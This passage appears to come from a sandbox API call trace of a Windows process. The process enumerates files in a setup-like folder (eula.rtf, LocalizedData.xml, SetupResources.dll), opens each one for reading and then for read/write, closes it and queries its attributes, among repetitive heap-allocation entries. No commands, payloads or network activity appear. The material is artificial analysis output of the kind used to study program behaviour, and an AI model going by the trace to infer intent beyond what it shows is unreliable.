hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.794] CloseHandle (hObject=0x41c) returned 1 [0061.794] AreFileApisANSI () returned 1 [0061.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0061.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 36 [0061.795] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.795] GetFileType (hFile=0x41c) returned 0x1 [0061.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0061.795] CloseHandle (hObject=0x41c) returned 1 [0061.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0061.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0061.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0061.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0061.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.796] AreFileApisANSI () returned 1 [0061.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69170 [0061.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\eula.rtf") returned 36 [0061.796] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbfd)) returned 1 [0061.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0061.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0061.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.796] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1387c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0061.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0061.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0061.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0061.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.797] AreFileApisANSI () returned 1 [0061.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0061.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0061.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0061.797] AreFileApisANSI () returned 1 [0061.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71758 [0061.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 45 [0061.797] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.798] GetFileType (hFile=0x41c) returned 0x1 [0061.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0061.798] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.798] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.798] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.899] CloseHandle (hObject=0x41c) returned 1 [0061.899] AreFileApisANSI () returned 1 [0061.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0061.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 45 [0061.900] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.900] GetFileType (hFile=0x41c) returned 0x1 [0061.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.900] CloseHandle (hObject=0x41c) returned 1 [0061.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0061.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0061.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.900] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.900] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.901] AreFileApisANSI () returned 1 [0061.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a30 [0061.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml") returned 45 [0061.901] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\3082\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3082\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1387c)) returned 1 [0061.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0061.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0061.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.901] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.901] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0061.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.901] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.901] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0061.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0061.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0061.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0061.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0061.902] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.902] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.902] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.902] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0061.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0061.902] AreFileApisANSI () returned 1 [0061.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\3082\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\3082\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0061.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.902] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.902] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0061.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0061.902] AreFileApisANSI () returned 1 [0061.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.902] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x717c0 [0061.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\3082\\SetupResources.dll") returned 46 [0061.902] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\3082\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.903] GetFileType (hFile=0x41c) returned 0x1 [0061.903] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0061.903] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.903] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.903] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.903] CloseHandle (hObject=0x41c) returned 1 [0061.903] AreFileApisANSI () returned 1 [0061.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0061.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: 